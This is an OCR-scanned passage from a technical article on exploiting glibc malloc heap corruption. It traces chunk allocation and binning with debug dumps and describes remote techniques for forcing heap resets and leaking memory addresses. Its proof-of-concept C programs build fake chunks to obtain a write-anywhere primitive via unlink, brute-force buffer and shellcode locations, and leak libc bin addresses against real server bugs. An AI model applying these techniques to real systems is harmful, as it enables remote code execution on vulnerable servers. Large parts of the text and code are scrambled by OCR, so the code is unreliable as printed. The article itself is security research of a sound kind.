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p = next_chunk (p); 


} 
fprintf(stderr,"sbrk_end %p\n",sbrk_baset+tsbrked_mem) ; 


} 


static void 


Li STDC 
heap_layout (arena *ar_ptr) 

else 
heap_layout (ar_ptr) arena *ar_ptr; 
#endif 


mchunkptr p; 


fprintf(stderr, "\n--- HEAP LAYOUT ---\n"); 


p = (mchunkptr) (((unsigned long) sbrk_base + MALLOC_ALIGN_MASK) & 
“MALLOC_ALIGN_MASK) ; 


for(;;p=next_chunk(p)) { 

if(p==top(ar_ptr)) { 
fprintf(stderr,"|T|\n\n"); 
break; 

} 

if ( (p->fd==Last_remainder (ar_ptr) ) && (p->bk==last_remainder(ar_ptr))) { 
fprintf(stderr,"|L|"); 
continue; 

} 

if(inuse(p)) { 
fprintf(stderr, "|A|"); 
continue; 


fprintf(stderr, "|%lu|",bin_index(p->size)); 
continue; 


static void 


if’ STDC 
bin_dump (arena *ar_ptr) 
else 
bin_dump(ar_ptr) arena *ar_ptr; 
endif 
int 1; 
mbinptr b; 


mchunkptr p; 
fprintf(stderr, "\n--- BIN DUMP ---\n"); 
(void) mutex_lock (éar_ptr->mutex) ; 


fprintf(stderr,"arena @ %p -— top @ %p - top size = 0x%.4x\n", 
ar_ptr,top(ar_ptr),chunksize(top(ar_ptr))); 


for (i = 1; i < NAV; ++i) 
{ 
char f = 0; 
b = bin_at(ar_ptr, i); 
for (p = last(b); p != b; p = p->bk) 
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fprintf(stderr," bin %d @ %p\n",i,b); 
} 
fprintf(stderr," free_chunk @ %p - size 0x%.4x\n", 


p,chunksize(p)); 
} 


(void) mutex_unlock (&ar_ptr->mutex) ; 
fprintf(stderr,"\n"); 


--] 4.2.1 Proof of concept 2: Heap layout debugging 


We’1l use the following code to show how the debug functions help to 
analyse the heap layout: 


#include <malloc.h> 

int main(void) { 
void *curly, *larry, *moe, *po, *lala, *dipsi, *tw, *piniata; 
curly = malloc(256); 

larry = malloc(256); 

moe = malloc(256); 

po = malloc(256); 

lala = malloc(256); 


tw = malloc(128); 
piniata = malloc(128); 
dipsi = malloc(1500); 
free (dipsi); 
free(lala); 


} 


The sample debugging section helps to understand malloc’s basic 
algorithms and data structures: 


(gdb) set env LD_PRELOAD ./heapy.so 


We override the real malloc with our debugging functions, heapy.so also 
includes the heap layout dumping functions. 


(gdb) xr 
Starting program: /home/jp/cerebro/heapy/debugging_sample 


4 curly = malloc(256); 


[1679] MALLOC (256) - CHUNK_ALLOC (0x40018040,264) 
extended top chunk: 
previous size 0x0 
new top 0x80496a0 size 0x961 
returning 0x8049598 from top chunk 


(gdb) p heap_dump (0x40018040) 


—--— HEAP DUMP —--- 

ADDRESS SIZ 
sbrk_base 0x8049598 
chunk 0x8049598 0x0109 (A) 
chunk 0x80496a0 0x0961 (T) 
sbrk_end 0x804a000 


al 


FD BK 


(gdb) p bin_dump (0x40018040) 


--- BIN DUMP --- 
arena @ 0x40018040 - top @ 0x80496a0 - top size = 0x0960 


(gdb) p heap_layout (0x40018040) 


BAP: LAYOUT. >-= 
|A||T| 
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12 


he first chunk is allocated, note t 
ize (256 bytes) and the size passed 
hunk, the top needs to be extended 

perating system. More memory than t 
pace is allocated to the ‘top chunk 
n the heap_dump()’s output the (A) 

he (T) means the chunk is the top o 
as its last bit set, indicating the 


T 
s 
C 
fo) 
s 
I 
t 
h 


/* size field is or’ed with PR 


*/ 


EV_INU 


Ge 
E 


define PR 


EV_INUS! 


Ox1lUL 


The bin_dump()’s output shows no bin 
except from the top. The heap_layout 
chunk next to the top. 


5 larry malloc(256); 


[1679] MALLOC (256) - CHUNK_ALLOC (0x4 
returning 0x80496a0 from top chu 
new top 0x80497a8 size 0x859 


--- H 


EAP DUMP --- 
ADDRESS 
sbrk_base 0x8049598 


SIZ 


al 


chunk 0x8049598 0x0109 (A) 
chunk 0x80496a0 0x0109 (A) 
chunk 0x80497a8 0x0859 (T) 
sbrk_end 0x804a000 

--- BIN DUMP --- 


arena @ 0x40018040 —- top @ 0x80497a8 


>> sHEAP. LAYOUT --= 
|A| A] [TI 


A new chunk is allocated from the remaining space at the top chunk. 


same happens with the next malloc() 


moe malloc(256); 


[1679] MALLOC (256) - CHUNK_ALLOC (0x4 
returning 0x80497a8 from top chu 
new top 0x80498b0 size Ox751 


—--— HEAP DUMP —--- 
ADDRESS SIZE 
sbrk_base 0x8049598 
chunk 0x8049598 0x0109 (A) 
chunk 0x80496a0 0x0109 (A) 
chunk 0x80497a8 0x0109 (A) 
chunk 0x80498b0 O0x0751 (T) 
sbrk_end 0x804a000 
—-- BIN DUMP --- 
arena @ 0x40018040 - top @ 0x80498b0 


s== (HEAP? GAYOUL ==> 
[A] JAI IAI IT 


he difference between the requested 
to chunk_alloc(). As there is no 
and memory is requested to the 


he needed is requested, the remaining 


, 


represents an allocated chunk, while 
ne. Note the top chunk’s size (0x961) 
previous chunk is allocated: 


Ge 
bE 


S] 


when previous adjacent chunk in use 


, as there is no free chunk yet, 
()’s output just shows an allocated 


0018040,264) 
nk 


FD BK 


- top size 0x0858 


The 
calls. 


0018040,264) 
nk 


FD BK 


0x0750 


-— top size 
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7 po = malloc(256); 


[1679] MALLOC (256) - CHUNK_ALLOC (0x40018040,264) 
returning 0x80498b0 from top chunk 
new top 0x80499b8 size 0x649 


—--— HEAP DUMP —--- 
ADDRESS SIZE FD BK 

sbrk_base 0x8049598 

chunk 0x8049598 0x0109 (A) 

chunk 0x80496a0 0x0109 (A) 

chunk 0x80497a8 0x0109 (A) 

chunk 0x80498b0 0x0109 (A) 

chunk 0x80499b8 0x0649 (T) 

sbrk_end 0x804a000 


--- BIN DUMP --- 
arena @ 0x40018040 - top @ 0x80499b8 - top size = 0x0648 


===> “HEAP: TAYOUD ==> 
IA JAI JAI IAI ITI 


8 lala = malloc(256); 


[1679] MALLOC (256) - CHUNK_ALLOC (0x40018040,264) 
returning 0x80499b8 from top chunk 
new top 0x8049ac0O size 0x541 


—-—-— HEAP DUMP —--- 
ADDRESS SIZE FD BK 

sbrk_base 0x8049598 

chunk 0x8049598 0x0109 (A) 

chunk 0x80496a0 0x0109 (A) 

chunk 0x80497a8 0x0109 (A) 

chunk 0x80498b0 0x0109 (A) 

chunk 0x80499b8 0x0109 (A) 

chunk 0x8049ac0 0x0541 (T) 

sbrk_end 0x804a000 


--- BIN DUMP --- 
arena @ 0x40018040 - top @ 0x8049acO - top size = 0x0540 


=-> (HEAP LAYOUT =>= 
[A] JA] JA] JA] /A[ [TI 


9 free(larry); 
[1679] FREE (0x80496a8) -— CHUNK_FREE (0x40018040, 0x80496a0) 
fronlink (0x80496a0, 264, 33,0x40018148,0x40018148) new free chunk 


—--— HEAP DUMP —--- 
ADDRESS SIZE FD BK 
sbrk_base 0x8049598 
chunk 0x8049598 0x0109 (A) 
chunk 0x80496a0 0x0109 (F) | 0x40018148 | 0x40018148 | (LC) 
chunk 0x80497a8 0x0108 (A) 
chunk 0x80498b0 0x0109 (A) 
chunk 0x80499b8 0x0109 (A) 
chunk 0x8049ac0 0x0541 (T) 
sbrk_end 0x804a000 


=== BIN, ‘DUMP: =>= 
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arena @ 0x40018040 - top @ 0x8049ac0O - top size = 0x0540 
bin 33 @ 0x40018148 
free_chunk @ 0x80496a0 - size 0x0108 


--- HEAP LAYOUT --~ 
IAI | 33] /AIJALIAI ITI 


A chunk is freed. The frontlink() macro is called to insert the new fr 
chunk into the corresponding bin: 


frontlink(ar_ptr, new_free_chunk, size, bin_index, bck, fwd); 


Note the arena address parameter (ar_ptr) was omitted in the output. 

In this case, the chunk at 0x80496a0 was inserted in the bin number 33 

according to its size. As this chunk is the only one in its bin (we can 
check this in the bin_dump()’s output), it’s a lonely chunk (LC) (we’1l 
see later that being lonely makes /’him’ dangerous...), its 

bk and fd pointers are equal and point to the bin number 33. 

In the heap_layout()’s output, the new free chunk is represented by the 
number of the bin where it is located. 


10 free (po); 


[1679] FREE (0x80498b8) - CHUNK_FREE (0x40018040, 0x80498b0) 
fronlink (0x80498b0, 264, 33, 0x40018148,0x80496a0) new free chunk 


5 


5 


—-- HEAP DUMP --- 
ADDRESS SIZ 


al 


FD BK 


sbrk_base 0x8049598 

chunk 0x8049598 0x0109 (A) 

chunk 0x80496a0 0x0109 (F) | 0x40018148 | O0x080498b0 | 
chunk 0x80497a8 0x0108 (A) 

chunk 0x80498b0 0x0109 (F) | 0x080496a0 | 0x40018148 | 
chunk 0x80499b8 0x0108 (A) 

chunk 0x8049ac0 0x0541 (T) 

sbrk_end 0x804a000 


--- BIN DUMP --- 
arena @ 0x40018040 - top @ 0x8049acO - top size = 0x0540 
bin 33 @ 0x40018148 
free_chunk @ 0x80496a0 - size 0x0108 
free_chunk @ 0x80498b0 - size 0x0108 


--- HEAP LAYOUT --~- 
[AJ |33/ /AI 133] 1Al ITI 


Now, we have two free chunks in the bin number 33. We can appreciate now 
how the double linked list is built. The forward pointer of the chunk at 
0x80498b0 points to the other chunk in the list, the backward pointer 
points to the list head, the bin. 

Note that there is no longer a lonely chunk. Also, we can see the 
difference between a heap address and a libc address (the bin address), 
0x080496a0 and 0x40018148 respectively. 


11 tw = malloc(128); 


[1679] MALLOC (128) - CHUNK_ALLOC (0x40018040,136) 
unlink (0x80496a0, 0x80498b0,0x40018148) from big bin 33 chunk 1 (split) 
new last_remainder 0x8049728 


—-—-— HEAP DUMP —---— 

ADDRESS SIZ 
sbrk_base 0x8049598 
chunk 0x8049598 0x0109 (A) 


al 


FD BK 
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chunk 0x80496a0 0x0089 (A) 

chunk 0x8049728 0x0081 (F) | 0x40018048 | 0x40018048 | (LR) 
chunk 0x80497a8 0x0108 (A) 

chunk 0x80498b0 0x0109 (F) | 0x40018148 | 0x40018148 | (LC) 
chunk 0x80499b8 0x0108 (A) 

chunk 0x8049ac0 0x0541 (T) 

sbrk_end 0x804a000 


-—-- BIN DUMP ---— 

arena @ 0x40018040 - top @ 0x8049ac0O - top size = 0x0540 
bin 1 @ 0x40018048 

free_chunk @ 0x8049728 - size 0x0080 

bin 33 @ 0x40018148 

free_chunk @ 0x80498b0 - size 0x0108 


--- HEAP LAYOUT --~ 
IAI JAI ILIJALI 331 /AlIT 


In this case, the requested size for the new allocation is smaller than 
the size of the available free chunks. So, the first freed buffer is taken 
from the bin with the unlink() macro and splitted. The first part is 
allocated, the remaining free space is called the ’last remainder’, which 
is always stored in the first bin, as we can see in the bin_dump()’s 
output. 

In the heap_layout()’s output, the last remainder chunk is represented 
with a L; in the heap_dump()’s output, (LR) is used. 


12 piniata = malloc(128); 


[1679] MALLOC (128) -— CHUNK_ALLOC (0x40018040,136) 

clearing last_remainder 

frontlink (0x8049728,128,16,0x400180c0,0x400180c0) last_remainder 
unlink (0x80498b0, 0x40018148,0x40018148) from big bin 33 chunk 1 (split) 
new last_remainder 0x8049938 


—-—-— HEAP DUMP —--- 
ADDRESS SIZE FD BK 
sbrk_base 0x8049598 
chunk 0x8049598 0x0109 (A) 
chunk 0x80496a0 0x0089 (A) 
chunk 0x8049728 0x0081 (F) | 0x400180c0O | 0x400180c0O | (LC) 
chunk 0x80497a8 0x0108 (A) 
chunk 0x80498b0 0x0089 (A) 
chunk 0x8049938 0x0081 (F) | 0x40018048 | 0x40018048 | (LR) 
chunk 0x80499b8 0x0108 (A) 
chunk 0x8049ac0 0x0541 (T) 
sbrk_end 0x804a000 
$25 = void 
—--— BIN DUMP --- 


arena @ 0x40018040 - top @ 0x8049acO - top size = 0x0540 
bin 1 @ 0x40018048 
free_chunk @ 0x8049938 - size 0x0080 
bin 16 @ 0x400180c0 
free_chunk @ 0x8049728 - size 0x0080 


Tro SHEAR, LAYOUL << -s= 
[A|JA| [16] JA] JAI ILI IAT ITI 


As the last_remainder size is not enough for the requested allocation, the 
last remainder is cleared and inserted as a new free chunk into the 
corresponding bin. Then, the other fr chunk is taken from its bin and 
split as in the previous step. 
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13 dipsi = malloc(1500); 


[1679] MALLOC (1500) - CHUNK_ALLOC (0x400180 
clearing last_remainder 
frontlink (0x8049938,128,16,0x400180c0, 
extended top chunk: 
previous size 0x540 
new top 0x804a0a0 size Oxf6l 
returning 0x8049ac0O from top chunk 


—-- HEAP DUMP --- 


16 


40,1504) 


0x8049728) last_remainder 


ADDRESS SIZE FD BK 


sbrk_base 0x8049598 


chunk 0x8049598 0x0109 (A) 
chunk 0x80496a0 0x0089 (A) 
chunk 0x8049728 0x0081 (F) | 0x400180c 
chunk 0x80497a8 0x0108 (A) 
chunk 0x80498b0 0x0089 (A) 
chunk 0x8049938 0x0081 (F) | 0x0804972 
chunk 0x80499b8 0x0108 (A) 
chunk 0x8049ac0O Ox05el (A) 
chunk Ox804a0a0 OxO0f61 (T) 


sbrk_end 0x804b000 


--- BIN DUMP --- 
arena @ 0x40018040 - top @ 0x804a0a0 - top 
bin 16 @ 0x400180c0 
free_chunk @ 0x8049728 - size 0x0080 
free_chunk @ 0x8049938 - size 0x0080 


--- HEAP LAYOUT --- 
IA; JA] [16] JAI IAT |16/ 1A IAIITI 


0 | 0x08049938 | 


8 | Ox400180c0 | 


size = 0x0f60 


As no available free chunk is enough for the requested allocation size, 


the top chunk was extended again. 


14 free (dipsi); 


[1679] FREE (0x8049ac8) - CHUNK_FREE(0x4001 
merging with top 
new top 0x8049ac0 


8040,0x8049ac0) 


—--— HEAP DUMP —--- 
ADDRESS SIZE FD BK 
sbrk_base 0x8049598 
chunk 0x8049598 0x0109 (A) 
chunk 0x80496a0 0x0089 (A) 
chunk 0x8049728 0x0081 (F) | 0x400180c0O | 0x08049938 | 
chunk 0x80497a8 0x0108 (A) 
chunk 0x80498b0 0x0089 (A) 
chunk 0x8049938 0x0081 (F) | Ox 8049728 | 0x400180c0 | 
chunk 0x80499b8 0x0108 (A) 
chunk 0x8049ac0 0x1541 (T) 
sbrk_end 0x804b000 


==S BIN: 'DUMP? a> 


arena @ 0x40018040 - top @ 0x8049ac0O - top size = 0x1540 


bin 16 @ 0x400180c0 
free_chunk @ 0x8049728 - size 0x0080 
free_chunk @ 0x8049938 - size 0x0080 


--- HEAP LAYOUT --~ 
[AJ JA] |16/ JA] IAT |16//Al ITI 


The chunk next to the top chunk is freed, 


so it gets coalesced with it, 
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and it is not inserted in any bin. 


LS, free(lala); 


r 
5 


[1679] FREE (0x80499c0) - CHUNK_FREE (0x40018040, 0x80499b8) 
unlink (0x8049938, 0x400180c0,0x8049728) for back consolidation 
merging with top 
new top 0x8049938 


—-- HEAP DUMP --- 
ADDRESS SIZ 


al 


FD BK 


sbrk_base 0x8049598 

chunk 0x8049598 0x0109 (A) 

chunk 0x80496a0 0x0089 (A) 

chunk 0x8049728 0x0081 (F) | 0x400180c0O | 0x400180c0O | (LC) 
chunk 0x80497a8 0x0108 (A) 

chunk 0x80498b0 0x0089 (A) 

chunk 0x8049938 Oxl6c9 (T) 

sbrk_end 0x804b000 


--- BIN DUMP --- 

arena @ 0x40018040 - top @ 0x8049938 - top size = 0x16c8 
bin 16 @ 0x400180c0 

free_chunk @ 0x8049728 - size 0x0080 


==> HEAP GAYOUT. === 
[A|JA||]16] |A| [AI [TI 


Again, but this time also the chunk before the freed chunk is coalesced, as 
it was already free. 


--] 4.3 - Layout reset - initial layout prediction server model 


In this section, we analyse how different scenarios may impact on the 
exploitation process. 

In case of servers that get restarted, it may be useful to cause a 'heap 
reset’, which means crashing the process on purpose in order to obtain a 
clean and known initial heap layout. 

The new heap that gets built together with the new restarted process is 

in its ‘initial layout’. This refers to the initial state of the heap 
after the process initialization, before receiving any input from the 
user. The initial layout can be easily predicted and used as a the known 
starting point for the heap layout evolution prediction, instead of using 
a not virgin layout result of several modifications performed while 
serving client requests. This initial layout may not vary much across 
different versions of the targeted server, but in case of major changes in 
the source code. 

One issue very related to the heap layout analysis is the kind of process 
being exploited. 
In case of a process that serves several clients, heap layout evolution 
prediction is harder, as may be influenced by other clients that may be 
interacting with our target server while we are trying to exploit it. 
However, it gets useful in case where the interaction between the server 
and the client is very restricted, as it enables the attacker to open 
multiple connections to affect the same process with different input 
G 
O 
£ 
i 
a 
A 
Ss 


ommands. 

n the other hand, exploiting a one client per process server (i.e. a 
orking server) is easier, as long as we can accurately predict the 
nitial heap layout and we are able to populate the process memory in 
fully controlled way. 

s it is obvious, a server that does not get restarted, gives us just one 
hot so, for example, bruteforcing and/or 'heap reset’ can’t be applied. 


--] 4.4 Obtaining information from the remote process 
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The idea behind the techniques in this section is to force a remote 

server to give us information to aid us in finding the memory locations 
needed for exploitation. 

This concept was already used as different mechanisms in the ’Bypassing 
PaX ASLR’ paper [13], used to bypass randomized space address processes. 
Also, the idea was suggested in [4], as ’transforming a write primitive in 
a read primitive’. 


--] 4.4.1 Modifying server static data - finding process’ DATA 
This technique was originally seen in wuftpd ~{ exploits. When the ftpd 
process receives a 'help’ request, answers with all the available commands. 
These are stored in a table which is part of the process’ DATA, being a 
static structure. The attacker tries to overwrite part of the structure, 
and using the ’help’ command until he sees a change in the server’s answer. 


Now the attacker knows an absolute address within the process’ DATA, being 
able to predict the location of the process’ GOT. 


--] 4.4.2 Modifying user input - finding shellcode location 
The following technique allows the attacker to find the exact location of 
the injected shellcode within the process’ address space, being 

independent of the target process. 

To obtain the address, the attacker provides the process with some bogus 
data, which is stored in some part of the process. Then, the basic 
primitive is used, trying to write 4 bytes in the location the bogus 

data was previously stored. After this, the server is forced to reply 

using the supplied bogus data. 

If the replayed data differs from the original supplied (taken into account 
any transformation the server may perform on our input), we can be sure 
that next time we send the same input sequence to the server, it will be 


stored in the same place. The server’s answer may be truncated if a 
function expecting NULL terminating strings is used to craft it, or to 
obtain the answer’s length before sending it through the network. 


In fact, the provided input may be stored multiple times in different 
locations, we will only detect a modification when we hit the location 
where the server reply is crafted. 

Note we are able to try two different addresses for each connection, 
speeding up the bruteforcing mechanism. 

The main requirement needed to use this trick, is being able to trigger 
the aa4bmo primitive between the time the supplied data is stored and the 
time the server’s reply is built. Understanding the process allocation 
behavior, including how is processed each available input command is 
needed. 


--] 4.4.2.1 Proof of concept 3 : Hitting the output 


The following code simulates a process which provides us with a aa4bmo 
primitive to try to find where a heap allocated output buffer is located: 


include <stdio.h> 
define SZ 256 
define SOMEOFFSET 5 + (rand() % (SZ-1) ) 


define PREV_INUSE 1 
define IS _MMAP 2 
define OUTPUTSZ 1024 


void aa4bmoPrimitive (unsigned long what, unsigned long where) { 
unsigned long *unlinkMe=(unsigned long*)malloc(SZ*sizeof (unsigned long)); 
int i= 


0; 
unlinkMe [i++] 4; 
unlinkMe [i++] 4; 
unlinkMe [i++] what; 
unlinkMe [i++] where-8; 
for(;i<SZ;1i+t) { 
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unlinkMe[i] = ((-(i-1) * 4) & “IS_MMAP) | PREV_INUSE ; 


} 
free (unlinkMe+SOMEOFFSBET) ; 
return; 


} 


int main(int argc, char **argv) { 
long where; 
char *output; 
int contador,i; 


printf ("## OUTPUT hide and seek ##\n\n"); 
output = (char*)malloc(OUTPUTSZ) ; 
memset (output,’0O’,OUTPUTSZ) ; 


for (contador=1; argv[contador] !=NULL; contador+tt) { 
where = strtol(argv[contador], (char **)NULL, 16); 
printf("({.] trying %p\n",where) ; 


aa4bmoPrimitive (where, where) ; 


for (i=0; i<OUTPUTSZ; i++) 
if(output[i] != ’0’){ 
printf("(!) you found the output @ %p :(\n",where) ; 
printf ("({%s]\n", output) ; 
return 0; 
} 
printf("(-) output was not @ %p :P\n",where) ; 


} 
printf£("(x) did not find the output <:|/\n"); 


LD_PRELOAD=./heapy.so ./hitOutput 0x8049ccc 0x80498b8 0x8049cd0 0x8049cd4 
Ox8049cd8 0x8049cdc 0x80498c8 > output 
## OUTPUT hide and seek # 
.] trying 0x8049ccc 
(-) output was not @ 0x8049ccc :P 
.] trying 0x80498b8 
(-) output was not @ 0x80498b8 :P 
-] trying 0x8049cd0 
(-) output was not @ 0x8049cd0 :P 
.] trying 0x8049cd4 
(-) output was not @ 0x8049cd4 :P 
.] trying 0x8049cd8 
(-) output was not @ 0x8049cd8 :P 
.] trying 0x8049cdc 
(-) output was not @ 0x8049cdc :P 
.] trying 0x80498c8 
(!) you found the output @ 0x80498c8 : ( 
OOOOO0000~ X*D*H™ X*D* HOOOOOOOOOOOOOOOOOOCOO0OOO0OO0OOO0O0O0O0O000000000000 


olelelelelelelelelelelelelelelelelelelelelelelelelelelelelelelelele(ele\ele\elelelelelelelelelelelelelelelelelelelelelelelelelelelelelelelele| 
Note the stamped output in the following hexdump: 


7920 756£ 6620 756f 646e 7420 6568 6£f20 

7475 7570 2074 2040 7830 3038 3934 6338 

2038 283a 5b0a 4f4f 4f£4f 4f£4f 4f4f 98c8 <== 
0804 98c8 0804 4f4f 4f4f 4f4f 4f4f 4£f4f <== 
4f4f 4f4f 4f4f 4f4f 4f4f 4f4f 4f4f 4f4f 

4f4f 4f4f 4f£4f Oadd 


This bruteforcing mechanism is not completely accurate in some cases, for 
xample, when the target server uses an output buffering scheme. 
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In order to improve the technique, we might mark some part of the supplied 
data as real shellcode, and other as nops, requiring the nop part to be hit 
while bruteforcing in order to avoid obtaining an address in the middle of 


our shellcode. Even better, we could tag each four bytes with a masked 
offset (i.e. to avoid character \x00 i.e.), when we analyse the reply w 
will now obtain the expected offset to the shellcode, so being able ina 


second try to see if actually in that expected address was stored our 
shellcode, detecting and avoiding this way the risk of our input being 
split and stored separated in the heap. 


For example, in the CVS ’Directory’ double free exploit [7], unrecognized 
commands (i.e. ’cucucucucu’) are used to populate the server heap. The 
server does not answer, just stores the provided data in the heap, and 
waits, until a noop or a command is received. After that, the unrecognized 
command that was sent is sent back without any modification to the client. 
We can provide the server with data almost without any size restriction, 
this data is stored in the heap, until we force it to be replayed to us. 
However, analysing how our unrecognized command is stored in the heap we 
find that, instead of what we expected (a single memory chunk with our 
data), there are other structures mixted with our input: 


—--— HEAP DUMP —---— 

ADDRESS SIZE FD BK 
[a2-e] 
chunk 0x80e9998 0x00661 (F) | 0x40018e48 | 0x40018e48 | 
chunk Ox80e9ff8 O0x10008 (A) 
chunk Ox80fa000 OxO00ff9 (F) | O0x40018ed0 | 0x0810b000 | 
chunk Ox80faff8 O0x10008 (A) 
chunk O0x810b000 Ox00ff9 (F) | Ox080fa000 | Ox0811c000 | 
chunk Ox810bff£8 Ox10008 (A) 
chunk 0x813e000 0x04001 (T) 
sbrk_end 0x8142000 


This happens becaus rror messages are buffered when generated, waiting 
to be flushed, some buffering state internal structures get allocated, 
and our data is split and stored in fixed size error buffers. 


--] 4.4.3 Modifying user input - finding libc’s DATA 


H 


n this situation, we are able to provide some input to the vulnerable 
server which is then sent as output to us again. For example, in the CVS 
Directory’ double free() vulnerability, we give the server and invalid 
ommand, which is finally echoed back to the client explaining it was an 
nvalid command. 
f we are able to force a call to free(), to an address pointing in 
omewhere in the middle of our provided input, before it is sent back to 
he client, we will be able to get the address of a main_arena’s bin. 

he ability to force a free() pointing to our supplied input, depends 

n the exploitation scenario, being simple to achieve this in 

double-free’ situations. 

When the server frees our input, it founds a very big sized chunk, so 

it links it as the first chunk (lonely chunk) of the bin. This depends 
mainly on the process heap layout, but depending on what we are exploiting 
it should be easy to predict which size would be needed to create the 

new free chunk as a lonely one. 

When frontlink() setups the new free chunk, it saves the bin address 

in the fw and bk pointer of the chunk, being this what ables us to obtain 
later the bin address. 

Note we should be careful with our input chunk, in order to avoid the 
process crashing while freeing our chunk, but this is quite simple in most 
cases, i.e. providing a known address near th nd of the stack. 


~ 


~OHTtMHERH-A 


The user provides as input a ’cushion chunk’ to the target process. free() 
is called in any part of our input, so our especially crafted chunk is 
inserted in one of the last bins (we may know it’s empty from the heap 
analysis stage, avoiding then a process crash). When the provided cushion 
chunk is inserted into the bin, the bin’s address is written in the fd and 
bk fields of the chunk’s header. 
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--] 4.4.3.1 Proof of concept 4 : Freeing the output 
The following code creates a ’cushion chunk’ as it would be sent to the 
server, and calls free() at a random location within the chunk (as the 
target server would do). 

The cushion chunk writes to a valid address to avoid crashing the process, 
nd its backward and forward pointer are set with the bin’s address by 

he frontlink() macro. 

hen, the code looks for the wanted addresses within the output, as would 
do an exploit which received the server answer. 


ct ® 


7 
ie 


include <stdio.h> 
define SZ 2 
define SOMEOFFSET iD) 
1 
2 


define PREV_INUSE 
define IS_MMAP 


unsigned long *aa4bmoPrimitive (unsigned long what, unsigned long where) { 
unsigned long *unlinkMe=(unsigned long*)malloc(SZ*sizeof (unsigned long)); 


int i = 0; 
unlinkMe [i++] 4. 
unlinkMe [i++] 4; 
unlinkMe [i++] what; 
unlinkMe [i++] where-8; 
for(;i<SZ;it+t) { 
unlinkMe[i] = ((-(i-1) * 4) & ~IS_MMAP) | PREV_INUSE ; 
} 
printf ("(-) calling free() at random address of output buffer...\n"); 


free (unlinkMe+SOMEOFFSBET) ; 
return unlinkMe; 


} 


int main(int argc, char **argv) { 
unsigned long *output; 
anit, iis 


x 


-EING THE OUTPUT PoC ##\n\n"); 


printf ("## FR 
(- 


printf("(-) creating output buffer...\n"); 
output = aa4bmoPrimitive (Oxbfffffc0, Oxbfffffc4); 
printf("(-) looking for bin address...\n"); 
for (i=0;i<SZ-1; itt) 
if (output[i] == output[itl] && 
((output[i] & OxffffO0000) != Oxffff0000)) f{ 
printf("(!) found bin address -> %p\n",output[i]); 


return 0; 


} 
printf("(x) did not find bin address\n"); 


./freeOutput 


5 


## FREEING THE OUTPUT PoC ## 

creating output buffer... 

calling free() at random address of output buffer... 
looking for bin address... 

found bin address —-> 0x4212bldc 


We get chunk free with our provided buffer: 


chunk_free (ar_ptr=0x40018040, p=0x8049ab0) at heapy.c:3221 

(gdb) x/20x p 

Ox8049ab0: Oxfffffded Oxfffffd69 Oxfffffde5 Oxfffffdel 
Ox8049ac0: Oxfffffddd Oxfffffd59 Oxfffffd55 Oxfffffd51 
0x8049ad0: Oxfffffd4d Oxfffffd49 Oxfffffd45 Oxfffffd41 
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0x804 
0x804 
(gdb) 
0x804 
0x804 
0x804 
0x804 
0x804 
(gdb) 
0x804 
0x804 
0x804 
0x804 
0x804 
(gdb) 


9ae0: 
9afO0: 


9b00: 
9b10: 
9b20: 
9b30: 
9b40: 


9b50: 
9b60: 
9b70: 
9b80: 
9b90: 


3236 
3237 
3239 
3278 
3280 
3294 


3296 
3298 
3306 
33.15 
3316 
3317 
3318 


After the frontlink () 
the address of the bin in which it 


fronlink (0x8049ab0, -668,126, 0x40018430,0x40018430) 


(gdb) 


Ox8049ab0: 
0x8049ac0: 
0x8049ad0: 
0x8049ae0: 
O0x8049af0: 


(gdb) c 

Continuing 
(-) 
Gh) 
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Oxfffffd3d Oxfffffd39 
Oxfffffd2d Oxfffffd29 
Oxfffffdlid Oxfffffd19 
Oxfffffd0d Oxfffffdo9 
Oxfffffcfd Oxfffffcf9 
Ox Oxfffffice9 
Ox Oxffffficd9 
Oxffff Oxfffffcc9 
Oxffff Oxfffffcb9 
Oxfffft Oxfffffcad 
Oxfffffc9d Oxfffffc99 
Oxfffffc8d Oxfffffc89 

next = chunk_at_offset(p, sz); 

nextsz = chunksize(next); 

if (next == top(ar_ptr) ) 

islr = 0; 

if (! (hd & PREV_INUSE) ) 

if (! (inuse_bit_at_offset (next, 


set_head(p, 


/* consolidate forward */ 


SZ 
if 
u 


+= nextsz; 


(!islr && next-—>fd 


nlink (next, 
sz | 


next—>prev_siz 


if 


( 
fro 


x/20x p 


Let’s check th 


islr) { 


be 


Ky 


PRI 


ntlink(ar_ptr, 


EV_INUSI 
= SZ; 


Pp 


fwd); 


GJ 


i 
idx, 


1 SZ, 


is 


Oxfffffdeéd 
Oxfffffdd5d 
Oxfffffd4d 
Oxfffffd3d 
Oxfffffd2d 


address w 


(gdb) 
0x40018430 
0x08049ab0 
0x40018440 
0x000007£0 
0x40018450 
0x0000016a 
0x40018460 
0x0000423c 
0x40018470 
0x4001370c 


And we see 


<mai 


<mai 


<mai 


a4 


I 


x/20x 0x40018430 
n_arenat1008>: 


RAME_] 


< 


it’s one 


F 


RAME_] 


looking for bin address... 
found bin address -—> 0x40018430 


Oxfffffd65 
Oxfffffd59 
Oxfffffd49 
Oxfffffd39 
Oxfffffd29 


obtained: 


n_arenatl024>: 


n_arenat+tl040>: 


0x40018428 


0x40018438 


0x00000001 


0x0000000c 


0x00000004 


22 


Oxfffffd35 
Oxfffffd25 
Oxfffffd1i5 
Oxfffffd05 
Oxfffffcf5 
Oxf Ffce5 
Oxffffficdd 
Oxffffficcd 
Oxfffffcb5 
Oxfffffcad 
Oxfffffc95 
Oxfffffc85 


/* merge with top */ 


/* consolidate backward */ 


nextsz))) 


bck, 


inserted: 


last_remainder (ar_ptr) ) 


fwd); 


macro is called with our supplied buffer, 


0x40018430 
Oxfffffd55 
Oxfffffd45 
OxfffffFd35 
Oxfffffd25 


0x40018428 


0x40018438 


0x00000000 


0x00001238 


0x00000094 


of the last bins of the main_arena. 


Ox 
Ox 


Fy Fh 
Fy Fh 
Fm Fh 
Fm Fh 


Ox 
Ox 
Ox 
Ox 
Ox 


FH FH FH FH Ih 


Ox 
Ox 
Ox 
Ox 
Ox 


Fh FH FH FH Fh 


Fh Fh 
Fh Fh 


it gets 


new free chunk 


0x40018430 
Oxfffffd51 
Oxfffffd41 
Oxfffffd31 
Oxfffffd21 


0x08049ab0 


0x40018040 


0x00000001 


0x0000000d 


0x00000005 


Although in this example we hit the cushion chunk in the first try on 


purpose, 


this tec 
output buffer also at the same time 


hnique can be applied to brute force the location of our 
(if we don’t know it beforehand). 
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--] 4.4.4 Vulnerability based heap memory leak - finding libc’s data 

the vulnerability itself leads to leaking process memory. 
For example, in the OpenSSL ’/SSLv2 Malformed Client Key Buffer Overflow’ 
vulnerability [6], the attacker is able to overflow a buffer and overwrite 
a variable used to track a buffer length. 

When this length is overwritten with a length greater than the original, 
